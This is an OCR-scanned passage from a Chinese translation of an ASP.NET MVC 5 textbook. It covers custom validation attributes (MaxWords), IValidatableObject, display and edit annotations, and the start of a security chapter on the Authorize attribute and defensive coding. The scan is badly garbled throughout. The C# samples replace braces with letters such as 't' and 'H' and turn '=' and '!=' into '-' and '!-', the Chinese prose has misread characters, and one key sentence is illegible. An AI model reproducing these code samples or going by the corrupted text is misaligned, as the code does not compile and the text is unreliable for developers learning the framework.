var cart - ShoppingCart.GetCart (this); 
cart.CreateOrder (newOrder); 
return RedirectToAction("Complete", new ( id = newOrder.OrderId ]); 
$ 
// Invalid -- redisplay with errors 
return View (newOrder); 
} 


可 以 采取 多 种 方式 来 处 理 这 个 问题 ， 但 是 注意 上 面 实现 的 两 段 代码 都 检查 了 模型 状态 的 
有 效 性 。 如 果 模型 状态 无 效 ， 操作 就 会 重新 泻 染 AddressAndPayment 视 图 , 给 用 户 一 个 修正 验 
证 错误 ， 重 新 提交 表单 的 机 会 。 

通过 上 面 的 介绍 ， 可 以 看 出 数据 注解 特性 给 验证 带 来 了 简易 性 和 透明 性 。 当 然 ， 这 些 内 
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置 的 特性 不 可 能 满足 应 用 程序 中 可 能 遇 到 的 所 有 验证 场合 。 框 架 提供 了 简易 的 方法 来 创建 自 
定义 的 验证 方法 ， 以 适应 特殊 场合 。 


6.2 自 定义 验证 逻辑 


ASPNET MVC 框 架 的 扩展 性 意味 着 实现 自 定义 验证 逻辑 有 着 很 大 的 可 行 性 。 本 节 重 点 介 
绍 两 个 核心 应 用 方法 : 

e. 将 验证 逻辑 封装 在 自 定义 的 数据 注解 中 。 

e. 将 验证 逻辑 封装 在 模型 对 象 中 。 

把 验证 逻辑 封装 在 自 定义 数据 注解 中 可 以 轻松 地 实现 在 多 个 模型 中 重用 逻辑 。 当 然 ， 这 
样 需要 在 特性 内 部 编写 代码 以 应 对 不 同类 型 的 模型 , 但 一 旦 实现 , 新 的 注解 就 可 以 在 多 处 重用 。 

另 一 方面 ， 如 果 将 验证 逻辑 直接 放 入 模型 对 象 中 ， 就 意味 着 验证 逻辑 可 以 很 容易 地 编码 
实现 ， 因 为 这 样 只 需要 关心 一 种 模型 对 象 的 验证 逻辑 ， 从 而 方便 了 对 对 象 的 状态 和 结构 做 某 
些 假定 ， 但 这 种 方式 不 利于 实现 逻辑 的 重用 。 

下 面 几 节 将 详细 介绍 这 两 种 方式 ， 首 先 介绍 自 定义 数据 注解 方式 。 


6.2.1 自 定义 注解 


假设 要 限制 顾客 输入 姓氏 中 单词 的 数量 ， 例 如 姓氏 中 单词 的 数量 不 得 超过 10 个 ， 并 且 还 
要 让 这 种 验证 (限定 一 个 string 类 型 的 最 大 单词 数 ) 在 Music Store 应 用 程序 的 其 他 模型 中 重用 。 
如 果 是 这 样 ， 可 考虑 将 验证 逻辑 封装 在 一 个 可 重用 的 特性 中 。 

所 有 的 验证 注解 (如 Required 和 Range) 特 性 最 终 都 派生 自 基 类 ValidationAttribute， 它 是 个 
抽象 类 , 在 名 称 空间 System.ComponentModel DataAnnotations 中 定义 。 同 样 ， 程 序 员 的 验证 罗 
辑 也 必须 派生 自 ValidationAttribute 的 类 : 


using System.ComponentModel.DataAnnotations; 


namespace MvcMusicStore.Infrastructure 

f 
public class MaxWordsAttribute : ValidationAttribute 
{ 
} 

) 


为 了 实现 这 个 验证 逻辑 ， 至 少 需要 重 写 基 类 中 提供 的 IsValid 方 法 的 其 中 一 个 版 本 。 重 写 
IsValid 方 法 时 利用 的 ValidationContext 参 数 ， 提 供 了 很 多 可 在 IsValid 方 法 内 部 使 用 的 信息 ， 如 
模型 类 型 、 模 型 对 象 实例 、 用 来 验证 属性 的 人 性 化 显示 名 称 以 及 其 他 有 用 信息 。 


public class MaxWordsAttribute : ValidationAttribute 
t 


M 


protected override ValidationResult IsValid( 
object value, ValidationContext validationContext) 


t 


return ValidationResult.Success; 
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IsValid 方 法 中 的 第 一 个 参数 是 要 验证 的 对 象 的 值 。 如 果 这 个 对 象 值 是 有 效 的 ， 就 可 以 返 
回 一 个 成 功 的 验证 结果 ， 但 在 判断 它 是 否 有 效 之 前 ， 需 要 知道 单词 数 的 上 限 。 要 获得 这 一 上 
PR, 可 以 通过 向 这 个 特性 添加 一 个 构造 函数 来 要 求 顾客 把 最 大 单词 数 作为 一 个 参数 传递 给 它 : 


public class MaxWordsAttribute : ValidationAttribute 
t 


public MaxWordsAttribute (int maxWords) 

t 
.maxWords = maxWords; 

} 

protected override ValidationResult IsValid( 
object value, ValidationContext validationContext) 

t 
return ValidationResult.Success; 

) 

private readonly int  maxWords; 

} 


既然 已 经 参数 化 了 最 大 的 单词 数 ， 下 面 就 可 以 实现 验证 逻辑 来 捕获 错误 了 : 


public class MaxWordsAttribute : ValidationAttribute 
{ 
public MaxWordsAttribute (int maxWords) 
{ 
_maxWords = maxWords; 
} 
protected override ValidationResult IsValid( 
object value, ValidationContext validationContext) 
t 
if (value !- null) 
t 
var valueAsString - value.ToString(); 
if (valueAsString.Split(' ').Length > maxWords) 
t 
return new ValidationResult("Too many words!"); 
) 
) 
return ValidationResult.Success; 
H 
private readonly int  maxWords; 
i 


上 面 的 代码 通过 使 用 Split 方 法 以 空格 作为 分 隔 符 来 分 隔 输 入 值 , 统计 生成 的 字符 串 数量 ， 
并 对 输入 字符 串 的 单词 数目 进行 简单 的 验证 。 如 果 单 词 数目 超过 了 上 限 ， 系 统 就 会 返回 一 个 
带 有 硬 编码 错误 提示 消息 的 ValidationResult 对 象 ， 以 告知 验证 失败 。 

上 面 代码 中 的 问题 在 于 硬 编码 的 错误 提示 消息 那 行 代码 。 使 用 数据 注解 的 开发 人 员 和 希望 
可 以 使 用 ValidationAttribute 的 ErorMessage 属 性 来 自 定义 错误 提示 消息 。 同 时 还 要 与 其 他 验证 
特性 一 样 , 提供 一 个 默认 的 错误 提示 消息 (在 开发 人 员 没有 提供 自 定义 的 错误 提示 消息 时 使 用 ) 
并 且 还 要 利用 验证 的 属性 名 称 生 成 错误 提示 消息 : 


public class MaxWordsAttribute : ValidationAttribute 
t 
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public MaxWordsAttribute (int maxWords) 
:base("(0) has too many words.") 
t 
 maxWords = maxWords; 
} 
protected override ValidationResult IsValid( 
object value, ValidationContext validationContext) 
t 
if (value !- null) 
t 
var valueAsString - value.ToString(); 
if (valueAsString.Split(' ').Length >  maxWords) 
t 
var errorMessage = FormatErrorMessage( 
validationContext.DisplayName); 
return new ValidationResult (errorMessage); 
) 
) 
return ValidationResult.Success; 
t 
private readonly int  maxWords; 
) 


前 面 的 代码 做 了 两 处 改动 : 

e 首先 , 向 基 类 的 构造 函数 传递 了 一 个 默认 的 错误 提示 消息 。 如 果 正 在 面向 国际 开发 应 

程序 的 话 ， 就 应 该 从 一 个 资源 文件 中 提取 这 个 默认 的 错误 提示 消息 。 

e 注意 ， 默 认 的 错误 提示 消息 中 包含 了 一 个 参数 占 位 符 ({0})。 这 个 占 位 符 之 所 以 存在 ， 
是 因为 第 二 处 改动 , 即 调用 继承 的 FormatErrorMessage 方法 会 自动 使 用 显示 的 属性 名 
称 来 格式 化 这 个 字符 串 。 

FormatErrorMessage 可 以 确保 我 们 使 用 合适 的 错误 提示 消息 字符 串 (即使 这 个 字符 串 是 存 


储 在 一 个 本 地 资源 文件 中 ) 。 这 条 代码 语句 需要 传递 name 属 性 的 值 ， 这 个 值 可 以 通过 
validationContext 参 数 的 DisplayName 属 性 获得 。 构 造 完 验证 逻辑 后 ， 就 可 以 将 其 应 用 到 任何 
模型 属性 上 : 
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[Required] 

[stringLength (160)] 

[MaxWords (10)] 

public string LastName { get; set; } 


甚至 可 以 赋予 特性 自 定义 的 错误 提示 消息 : 


[Required] 

[StringLength (160) ] 

[MaxWords (10, ErrorMessage="There are too many words in {0}")] 
public string LastName { get; set; } 


现在 ， 如 果 顾 客 输入 了 过 多 单词 ， 就 会 在 视图 中 看 到 如 图 6-8 所 示 的 提示 消息 。 


FirstName | 
{Scott 


LastName | 
[one two three four five six seven eight nine ten eleve] 
There are too many words in LastN. 


图 6-8 
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注意 ”可 以 按 NuGet 包 的 形式 获得 MaxWordsAttribute 。 搜 索 Wrox.ProMvc5. 
Validation. MaxWordsAttribute 并 将 相应 代码 添加 到 项 目 中 。 


自 定义 特性 只 是 向 模型 提供 逻辑 验证 的 一 种 方式 。 正 如 刚才 看 到 的 ， 特 性 是 很 容易 在 
很 多 不 同 模型 类 中 实现 复 用 的 。 第 8 章 会 介绍 如 何 为 MaxWordsAttribute 特 性 添加 客户 端 验证 
能 力 。 
6.2.2 IValidatableObject 

自 验证 (self validating) 模 型 是 指 一 个 知道 如 何 验证 自身 的 模型 对 象 。 一 个 模型 对 象 可 以 通 
过 实现 TIValidatableObject 接 口 来 实现 对 自身 的 验证 。 为 演示 这 个 方法 ， 下 面 在 Order 模 型 中 直 
接 实现 对 LastName 字 段 中 单词 个 数 的 检查 : 


public class Order : IValidatableObject 


{ 
public IEnumerable«ValidationResult» Validate( 
ValidationContext validationContext) 


t 


if (LastName !- null && 
LastName.Split(' ').Length » 10) 
t 
yield return new ValidationResult("The last name has too many 
words!", 
new []l("LastName"]); 


) 
) 
// rest of Order implementation and properties 


Vd cn 
H 
这 种 方式 与 特性 版 本 有 几 个 明显 的 不 同 点 : 
e. MVC 运行 时 为 执行 验证 而 调用 的 方法 名 称 是 Validate 而 不 是 IsValid, 但 更 重要 的 是 ， 
它们 的 返回 类 型 和 参数 也 不 同 。 
e Validate 的 返回 类 型 是 TEnumerable-ValidationResult», 而 不 是 单独 的 ValidationResult 
对 象 。 因 为 从 表面 上 看 ， 内 部 的 验证 逻辑 验证 的 是 整个 模型 ， 因 此 可 能 返回 多 个 验 
证 错误 。 
e 这 里 没有 value 参数 传递 给 Validate 方法 ， 因 为 在 此 Validate 是 一 个 模型 实例 方法 ， 
在 其 内 部 可 以 直接 访问 当前 模型 对 象 的 属性 值 。 
注意 上 面 的 代码 使 用 了 C# 的 yield return 语 法 来 构建 枚 举 返回 值 ， 同 时 代码 还 需要 显 式 地 
告知 ValidationResult 与 其 关联 的 字段 的 名 称 (在 这 个 例子 中 字段 的 名 称 是 LastName， 但 是 
ValidationResult 的 构造 函数 的 最 后 一 个 参数 是 String 类 型 的 数组 ， 因 为 这 样 可 以 使 结果 与 多 个 
属性 关联 )。 
许多 验证 场合 通过 TValidatableObject 方 式 都 可 以 更 容易 地 实现 , 尤其 是 在 需要 比较 模型 多 
个 属性 的 应 用 场合 中 。 
到 目前 为 止 , 我 们 已 经 对 所 有 需要 知道 的 验证 注解 做 了 介绍 , 但 是 ASPNET MVC 框 架 中 
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还 有 其 他 一 些 注解 ， 它 们 能 够 影响 运行 时 显示 和 编辑 模型 的 方式 。 在 前 面 介绍 “友好 地 显示 
名 称 ” 时 ， 提 到 了 这 些 注解 ， 现 在 是 深入 了 解 这 些 内 容 的 时 候 了 。 


6.3 显示 和 编辑 注解 


在 本 章 的 开始 部 分 ， 我 们 为 顾客 创建 一 个 表单 来 提交 订单 处 理 所 需 要 的 信息 。 当 时 是 使 
用 HTML 辅助 方法 EditorForModel 实 现 的 ， 但 生成 的 表单 与 期 望 不 符 ， 图 6-9 会 帮助 我 们 唤醒 
记忆 。 


Username 


FirstName 
Scott 


图 6-9 


在 这 个 截图 中 ， 可 以 明显 地 看 出 两 个 问题 : 

e 不 应 该 显示 Username 字段 ( 它 是 由 控制 器 操作 中 的 代码 来 填充 和 管理 的 )。 

e FirstName 字段 的 First 和 Name 两 个 单词 中 间 应 该 有 一 个 空格 。 

解决 这 些 问 题 的 方法 也 在 名 称 空间 DataAnnotations 中 。 

和 前 面 看 到 的 验证 特性 一 样 ， 模 型 元 数据 提供 器 会 收集 下 面 的 显示 (和 编辑 ) 注 解 信息 ， 
以 供 HTML 辅助 方法 和 ASPNET MVC 运 行 时 的 其 他 组 件 使 用 。HTML 辅助 方法 可 以 使 用 任何 
可 用 的 元 数据 来 改变 模型 的 显示 和 编辑 UI。 


6.3.1 Display 


Display 特 性 可 为 模型 属性 设置 友好 的 “显示 名 称 ”。 这 里 就 可 以 使 用 Display 特 性 修改 
FirstName 字 段 的 标签 显示 名 称 : 


[Required] 

[StringLength (160, MinimumLength-3)] 
[Display (Name-"First Name")] 

public string FirstName ( get; set; } 


加 上 这 个 特性 后 ， 视 图 就 会 泻 染 出 如 图 6-10 所 示 的 画面 。 


Username 


First Name 


图 6-10 


除了 名 字 外 ，Display 特 性 还 可 以 控制 UI 上 属性 的 显示 顺序 。 例 如 ， 要 实现 对 LastName 
和 FirstName 编 辑 框 显示 次 序 的 控制 ， 可 使 用 下 面 的 代码 : 


[Required] 

[StringLength (160)] 

[Display (Name="Last Name", Order=15001)] 

[MaxWords (10, ErrorMessage="There are too many words in {0}")] 
public string LastName { get; set; } 
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[Required] 

[StringLength (160, MinimumLength-3)] 

[Display (Name-"First Name", Order-15000)] 

public string FirstName { get; set; } 

假设 在 Order 模 型 中 没有 其 他 属性 具有 Display 特 性 , 那么 表单 中 最 后 两 个 字段 的 顺序 应 该 
先是 FirstName， 然 后 才 是 LastName。Order 参 数 的 默认 值 是 10 000， 各 个 字段 将 按照 这 个 值 逢 
序 排列 。 


6.3.2. ScaffoldColumn 


ScaffoldColumn 特 性 可 以 隐藏 HIML 辅助 方法 (如 EditorForModel 和 DisplayForMode]) 泻 染 
[ScaffoldColumn(false)] 
public string Username ( get; set; } 
添加 这 个 特性 后 ，EditorForModel 辅 助 方法 将 不 再 为 Usemame 字 段 显示 输入 元 素 和 label 
标签 。 然 而 这 里 需要 注意 的 是 ， 如 果 模型 绑 定 器 在 请 求 中 看 到 匹配 的 值 ， 那 么 它 仍然 会 试图 
为 Username 属 性 赋值 。 第 7 章 会 深入 介绍 这 个 应 用 ( 称 为 重复 提交 )。 
尽管 上 面 介绍 的 这 两 个 特性 足以 应 对 订单 表单 的 所 有 显示 场合 ， 但 下 面 仍然 继续 讲解 和 
ASPNET MVC 结 合 使 用 的 其 他 注解 。 


6.3.3 DisplayFormat 


通过 命名 参数 ，DisplayFormat 特 性 可 用 来 处 理 属性 的 各 种 格式 化 选项 。 当 属性 包含 空 值 
时 ， 可 以 提供 可 选 的 显示 文本 ， 也 可 以 为 包含 标记 的 属性 关闭 HTML 编码 ， 还 可 以 为 运行 时 
指定 一 个 应 用 于 属性 值 的 格式 化 字符 串 。 下 面 的 代码 可 将 模型 的 Total 属 性 值 格式 化 为 货币 值 
形式 : 

[DisplayFormat (ApplyFormatInEditMode-true, DataFormatstring="{0:c}")] 

public decimal Total ( get; set; } 

ApplyFormatInEditMode 参 数 的 值 默 认 是 外 lse， 所 以 如 果 想 把 Total 属 性 格式 化 为 表单 输入 
元 素 ， 需 要 将 属性 ApplyFormatInEditMode 的 值 设置 为 rue。 例 如 ， 当 把 模型 中 decimal 类 型 的 
Total 属 性 值 设置 为 12.1 时 ， 将 在 视图 中 看 到 如 图 6-11 所 示 的 输出 。 


Total 
[$12.10 


图 6-11 


之 所 以 将 ApplyFormatInEditMode 参 数 的 默认 值 设 为 flse， 其 中 一 个 主要 原因 是 ASPNET 
MVC 模 型 绑 定 器 不 能 显示 那些 解析 格式 化 的 值 。 在 这 个 例子 中 ， 由 于 字段 中 包含 有 货币 符号 ， 
模型 绑 定 器 将 不 能 解析 提交 回 的 价格 值 。 因 此 应 将 属性 ApplyFormatImEditModel 的 值 设 为 false。 
6.3.4 ReadOnly 


如 果 需 要 确保 默认 的 模型 绑 定 器 不 使 用 请 求 中 的 新 值 来 更 新 属性 ， 可 在 属性 上 添加 
ReadOnly 特 性 : 
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ReadOnly (true) ] 
public decimal Total ( get; set; ] 


注意 这 里 的 EditorForModel 辅 助 方法 仍 会 为 Total 属 性 显示 一 个 可 用 的 输入 元 素 ， 因 此 ， 
只 有 模型 绑 定 器 考虑 ReadOnly 特 性 。 


6.3.5 DataType 


DataType 特 性 可 为 运行 时 提供 关于 属性 的 特定 用 途 信息 。 例如 ，String 类 型 的 属性 可 应 用 
于 很 多 场合 一 可 以 保存 e-mail 地 址 、URI 或 是 密码 。DataType 特 性 可 以 满足 所 有 这 些 需求 。 
如 果 看 过 MVC Music Store 的 账户 登录 模型 ， 就 会 发 现下 面 的 代码 : 

[Required] 

[DataType (DataType.Password)] 

[Display (Name="Password")] 

public string Password { get; set; } 

对 于 一 个 Name 参 数 为 Password 的 DataType, ASPNET MVC 中 的 HTML 编辑 器 辅助 方法 就 
会 泻 染 一 个 type 特 性 值 为 “password” 的 输入 元 素 。 这 就 意味 着 当 在 浏览 器 中 输入 密码 时 ， 就 
看 不 到 输入 的 字符 了 (如 图 6-12 所 示 )。 


图 6-12 


其 他 数据 类 型 还 有 Currency、Date、Time 和 MaultilineText。 
6.3.6 UlHint 


UIHint 特 性 给 ASPNET MVC 运 行 时 提供 了 一 个 模板 名 称 ， 以 备 调用 模板 辅助 方法 (如 
DisplayFor 和 EditorFor) 泻 染 输出 时 使 用 。 也 可 定义 自己 的 模板 辅助 方法 来 重 写 ASPNET MVC 的 默 
认 行为 ， 第 16 章 将 介绍 如 何 自 定义 模板 。 找 不 到 UIHint 指 定 的 模板 时 ，MVC 会 寻找 一 个 合 i 
的 替代 模板 使 用 。 


6.3.7 Hiddenlnput 


HiddenInput 在 名 称 空间 System.Web.Mvc 中 ， 它 可 以 告知 运行 时 泻 染 一 个 type 特 性 值 为 
“hidden” 的 输入 元 素 。 隐 藏 输入 可 以 很 好 地 保存 表单 中 信息 ， 但 用 户 在 浏览 器 中 不 能 看 到 ， 
也 不 能 编辑 这 些 数据 (因为 恶意 用 户 可 以 通过 改变 提交 的 表单 值 来 改变 输入 值 , 所 以 不 要 想 当 
然 地 认为 这 个 特性 是 万 无 一 失 的 )， 以 便 浏览 器 将 原 有 数据 返回 给 服务 器 。 


6.4 小 结 


本 章 首先 介绍 了 应 用 于 验证 的 数据 注解 ， 接 着 介绍 了 ASPNET MVC 运 行 时 如 何在 Web 应 
用 程序 中 使 用 模型 元 数据 、 模 型 绑 定 器 以 及 HTML 辅 助 方法 来 构建 良好 的 验证 逻辑 。 这 些 验 
证 不 需要 重复 的 代码 就 可 以 在 服务 器 端 和 客户 端 都 提供 验证 特性 。 还 介绍 了 如 何 为 自 定义 的 
验证 逻辑 构建 自 定义 的 注解 ， 并 与 自 验证 模型 进行 了 比较 。 最 后 阐述 了 如 何 使 用 数据 注解 来 
影响 视图 中 HTML 辅 助 方法 的 HTMI 输 出 。 
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本 章 主要 内 容 

e ZRH Authorize 特性 登录 

e 要 求 角色 成 员 使 用 Authorize 特性 

e Web 应 用 程序 中 安全 向 量 的 用 法 

e 防御 性 编码 

本 章 代码 下 载 : 

如 前 言 所 述 ， 本 章 所 有 代码 通过 NuGet 提 供 。 对 于 NuGet 代 码 示例 ， 每 个 应 用 程序 段 的 末 
尾 做 了 清晰 的 说 明 。 以 下 网 址 也 提供 了 NuGet 包 ， 以 供 脱 机 使 用 : 


http://wwwW.wrox.com/go/proaspnetmvce5。 


7.1 安全 性 : 无 趣 、 但 极其 重要 


保护 Web 应 用 程序 的 安全 性 看 起 来 是 件 苦 差事 。 这 件 必 须要 做 的 工作 并 不 能 带 来 太 多 乐 
趣 。 但 是 为 了 回避 乾 粉 的 安全 漏洞 问题 ， 程 序 的 安全 性 通常 还 是 不 得 不 做 的 。 


ASP.NET Web Forms 开发 人 员 : 我 们 不 在 堪萨斯 州 ! 

因为 ASPNET MVC 不 像 ASPNET Web Forms 那 样 提供 了 很 多 自动 保护 机 制 来 保护 页 而 
不 受 恶 意 用 户 的 攻击 ， 所 以 必须 阅读 本 章 来 了 解 这 方面 的 知识 。 更 明确 地 说 ，ASPNET Web 
Forms 致 力 于 使 应 用 程序 免 受 攻击 。 例 如 : 

e 服务 器 组 件 对 显示 的 值 和 特性 进行 HIML 编码 ， 以 帮助 阻止 XSS 攻 击 。 

e ”加 密 和 验证 视图 状态 ， 从 而 帮助 阻止 自 改 提交 的 表单 。 

e 请 求 验证 (<% (Qpage validaterequest="true"”%>) 截 获 看 起 来 是 恶意 的 数据 ， 并 给 出 警告 

(这 是 ASPNET MVC 框 架 默 认 开 启 的 保护 )。 
e 事件 验证 帮助 阻止 注入 攻击 和 提交 无 效 值 。 
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转向 ASPNET MVC 意 味 着 这 些 问题 的 处 理 落 到 了 程序 员 的 肩 上 一 一 对 于 某 些 人 来 说 可 
能 会 引起 恐慌 ， 而 对 另 一 些 人 来 说 可 能 是 一 件 好 事 。 

如 果 认 为 框架 “就 应 该 处 理 这 种 事情 ”的 话 , 那么 确实 有 一 种 框架 可 以 处 理 这 一 类 事情 ， 
而 且 处 理 得 很 好 ， 它 就 是 ASPNET Web Forms。 然 而 ， 其 代价 就 是 失去 了 一 些 控制 ， 因 为 
ASPNET Web Forms 引 入 了 抽象 层次 。 

ASPNET MVC 对 标记 和 程序 的 运行 提供 了 更 多 控制 ， 这 意味 着 程序 员 要 承担 更 多 责任 。 
要 明确 的 是 ，ASPNET MVC 提 供 了 许多 内 置 的 保护 机 制 (例如 ， 默 认 利 用 HTML 辅助 方法 和 
了 Razor 语 法 进行 HTML 编码 以 及 请 求 验证 等 功能 特性 ,以 及 使 用 通过 基 架 构建 的 控制 器 白 名 单 
表单 元 素来 防止 重复 提交 攻击 )。 然 而 ， 如 果 不 理解 Web 的 安全 机 制 一 这些 正 是 本 章 所 讲 的 
内 容 ， 就 很 容易 搬 起 石头 砸 自己 的 脚 。 


之 所 以 应 用 程序 存在 安全 隐患 ， 主 要 是 因为 开发 人 员 缺 乏 足够 的 信息 或 理解 。 我 们 想 要 
改变 这 一 局 面 ， 但 是 我 们 也 意识 到 人 无 完 人 ， 难 免 有 玻 忽 的 时 候 。 鉴 于 此 ， 请 记 住 这 里 的 锦 
襄 妙 语 ， 这 也 是 本 章 的 关键 总 结语 句 : 

KDE BIAIS UBI EH PERIERE o 

下 面 是 一 些 实际 的 例子 : 

。 每 当 泻 染 作 为 用 户 输入 而 引入 的 数据 时 ， 请 对 其 进行 编码 。 最 常见 的 做 法 是 使 用 
HTML 编码 。 但 是 ， 如 果 数 据 作 为 特性 值 显示 ， 就 应 对 其 进行 HTML 特性 编码 ;如 
果 数 据 用 在 JavaScript 代码 段 中 ， 就 应 对 其 进行 JavaScript 编码 。 有 些 时 候 ， 需 要 进 
行 多 层 编 码 ， 如 HTML 页 面 中 的 JavaScript 代码 段 。 

e 考虑 好 网 站 的 哪些 部 分 允许 匿名 访问 ， 哪 些 部 分 要 求 认证 访问 。 

e 不 要 试图 自己 净化 用 户 的 HTML 输入 (使 用 正则 表达 式 或 其 他 方法 ) 
失败 。 

e 在 不 需要 通过 客户 端 脚 本 (大 部 分 情况 下 ) 访 问 cookie 时 ， 使 用 HTTP-only cookie. 

e 请 记 住 ， 外 部 输入 不 只 是 显 式 的 表单 域 , 还 包括 URL 查询 字符 串 、 隐 藏 表单 域 、Ajax 
请 求 以 及 我 们 使 用 的 外 部 Web 服务 结果 等 。 

e 建议 使 用 AntiXSS 编码 器 (这 是 Microsoft Web Protection Library 的 一 个 组 件 。 
ASP.NET 4.5 及 更 高 版 本 自 带 该 库 )。 

显而易见 , 还 有 很 多 需要 学 习 的 内 容 一 一 包括 一 些 常见 攻击 的 工作 原理 及 其 背后 的 意图 。 
所 以 要 紧 跟 作者 的 思路 ， 接 下 来 将 揣测 用 户 的 想法 ， 当 然 那些 试图 攻击 我 们 站 点 的 人 也 算是 
用 户 。 这 样 你 就 有 了 敌人 ， 他 们 正在 等 待 你 构建 应 用 程序 ， 好 让 他 们 过 来 攻破 它 。 如 果 以 前 
没有 遇 到 过 这 种 情况 ， 那 么 可 能 的 原因 不 外 乎 以 下 两 种 : 

e 到 目前 为 止 还 没有 构建 过 应 用 程序 。 

e 以 前 没有 发 现 有 人 攻击 自己 的 应 用 程序 。 

黑客 、 解 密 高 手 、 垃 圾 邮件 发 送 者 、 病 毒 、 恶 意 软 件 一 一 它们 都 想 进入 计算 机 并 查看 里 
的 数据 。 在 阅读 本 段 内 容 时 ， 我 们 的 电子 邮箱 很 可 能 已 经 转发 了 很 多 封 电子 邮件 。 我 们 
鸭 端口 遭 到 了 扫描 ， 而 一 个 自动 化 的 蠕虫 很 有 可 能 正在 尝试 通过 各 种 操作 系统 漏洞 找到 进入 
PC 的 途径 。 由 于 这 些 攻击 都 是 自动 的 ， 因 此 它们 在 不 断 地 探索 ， 寻 找 一 个 开放 的 系统 。 
开始 介绍 本 章 内 容 似乎 有 些 艰难 ; 然而 需要 立刻 理解 的 一 点 是 : 这 并 不 是 个 人 问题 ， 不 


否则 就 会 


第 7 章 成 员 资 格 、 授 权 和 安全 性 


能 与 个 人 问题 等 同 看 待 。 事实 上 , 有 人 认为 所 有 计算 机 (以 及 其 中 的 信息 ) 都 是 等 待 捕 获 的 “ 猎 
物 ” 他 们 编写 程序 来 不 断 扫 描 漏洞 , 如 果 我 们 创建 的 应 用 程序 存在 漏洞 , 他 们 就 将 伺机 利用 。 
同时 ， 应 用 程序 的 构建 基于 这 样 一 个 假设 ， 即 只 有 特定 用 户 才能 执行 某 些 操作 ， 而 其 他 
户 则 不 能 执行 这 些 操作 。 开 发 人 员 和 希望 的 应 用 程序 使 用 方式 和 黑客 的 使 用 方式 之 间 有 一 条 
不 可 和 逾越 的 鸿沟 。 本 章 将 讲解 如 何 利用 成 员 资格 、 授 权 和 ASPNET MVC 中 提供 的 安全 特性 来 
让 用 户 以 及 那些 匿名 攻击 者 群体 以 我 们 希望 的 方式 使 用 应 用 程序 。 
本 章 首 先 介绍 如 何 使 用 ASPNET MVC 中 的 安全 特性 来 执行 像 授 权 这 样 的 应 用 功能 ， 然 
后 介绍 如 何 处 理 常见 的 安全 威胁 。 记 住 ， 尽 管 这 都 是 相同 连续 的 一 部 分 ， 但 是 确保 访问 
ASPNET MVC 应 用 程序 的 每 个 用 户 都 能 按照 设计 的 方式 使 用 它 ， 才 是 安全 问题 的 讨论 范畴 。 


7.2 ”使 用 Authorize 特 性 登录 


保护 应 用 程序 安全 的 第 一 步 ， 同 时 也 是 最 简单 的 一 步 ， 就 是 要 求 用户 只 有 登录 系统 才能 
访问 应 用 程序 的 特定 部 分 。 我 们 可 以 通过 使 用 控制 器 上 或 者 控制 器 内 部 特定 操作 上 的 
Authorize 操 作 过 滤器 来 实现 ， 甚 至 可 以 为 整个 应 用 程序 全 局 使 用 Authorize 操 作 过 滤器 。 
Authorize Attribute 是 ASPNET MVC 自 带 的 默认 授权 过 滤器 , 可 用 来 限制 用 户 对 操作 方法 的 访 
问 。 将 该 特性 应 用 于 控制 器 ， 就 可 以 快速 将 其 应 用 于 控制 器 中 的 每 个 操作 方法 。 


身份 验证 和 授权 


Se 


人 们 有 时 对 用 户 身 份 验 证 和 用 户 授权 之 间 的 区 别 感到 困惑 。 这 两 个 词 很 容易 混淆 ， 但 总 
的 来 讲 ， 身 份 验证 是 指 通 过 使 用 某 种 形式 的 登录 机 制 (包括 用 户 名 /密码 、OpenID、OAuth 等 
说 明 自 己 身份 的 项 ) 来 核实 用 户 的 身份 。 授权 验证 是 用 来 核实 登录 站 点 的 用 户 是 否 在 他 们 的 权 
限 内 执行 操作 。 这 通常 使 用 一 些 基于 角色 或 基于 声明 的 系统 来 实现 。 


Authorize 特 性 不 带 任何 参数 ， 只 要 求 用 户 以 某 种 角色 身份 登录 网 站 一 一 换 句 话说 ， 它 禁 
止 匿名 访问 。 接 下 来 首先 介绍 如 何 实现 禁止 匿名 访问 ， 而 后 介绍 对 特定 角色 或 声明 的 访问 权 
限 的 限制 。 


7.2.4 保护 控制 器 操作 


现在 根据 一 个 非常 简单 的 购物 应 用 需求 ， 开 始 创 建 音乐 商店 应 用 程序 。 程 序 中 的 
StoreController 控 制 器 仅 包含 两 个 操作 一 一 Index( 用 来 显示 专辑 列表 ) 和 Buy: 


using System.Collections.Generic; 

using System.Linq; 

using System.Web.Mvc; 

using Wrox.ProMvc5.Security.Authorize.Models; 


namespace Wrox.ProMvc5.Security.Authorize.Controllers 
t 
public class StoreController : Controller 
i 
public ActionResult Index () 
t 
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var albums = GetAlbums(); 
return View (albums); 
) 


public ActionResult Buy(int id) 
t 
var album = GetAlbums().Single(a => a.AlbumId -- id); 


//Charge the user and ship the album!!! 
return View (album); 
) 


// A simple music catalog 
private static List«Album» GetAlbums() 
t 
var albums = new List«Album»( 
new Album ( AlbumId - 1, Title 
Price = 8.99M), 
new Album ( AlbumId - 2, Title 
Price = 8.99M}, 
new Album ( AlbumId - 3, Title 
Price = 9.99M }, 
new Album ( AlbumId - 4, Title 
Price = 10.99M ], 


"The Fall of Math", 


"The Blue Notebooks", 


"Lost in Translation", 


"Permutation", 


uu 
return albums; 


) 
) 
显然 ， 上 面 的 代码 没有 禁止 用 户 的 匿名 访问 。 之 所 以 这 样 ， 是 因为 目前 的 控制 器 允许 用 
户 匿名 购买 专辑 。 然 而 ， 在 实际 应 用 中 ， 当 用 户 购买 专辑 时 ， 系 统 需 要 知道 他 们 的 身份 。 因 
此 ， 需 要 在 Buy 操 作 上 添加 Authorize 特 性 来 解决 这 个 问题 ， 代 码 如 下 所 示 : 
[Authorize] 


public ActionResult Buy(int id) 
t 


var album = GetAlbums().Single(a -» a.AlbumId -- id); 


//Charge the user and ship the album!!! 
return View (album); 
) 
如 果 想 查看 这 段 代码 ， 可 使 用 NuGet 将 Wrox.ProMvc5.Security.Authorize 包 安装 在 一 个 默 
认 的 ASPNET MVC 项 目 中 ， 命 令 如 下 所 示 : 


Install-Package Wrox.ProMvc5.Security.Authorize 


运行 应 用 程序 ， 浏 览 到 /Store， 将 看 到 一 个 专辑 列表 。 查 看 这 个 页 面 不 需要 登录 和 注册 ， 
如 图 7-1 所 示 。 

然而 ， 当 单 击 Buy 链 接 的 时 候 ， 就 会 要 求 登录 (如 图 7-2 所 示 )。 

由 于 我 们 现在 还 没有 账户 ,因此 需要 单 击 Register 链 接 ， 到 一 个 标准 账户 注册 页 面 进行 注 
册 ， 如 图 7-3 所 示 。 
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A Very Simple Store 


Tite 


The Fall of Math 


Tne Blue Notebooks 


Lost in Transiation 


Permutation 


© 2014 - My ASP.NET Application 


图 7-1 


E E 


Log in. 


Use a local account to log in. 


Password 


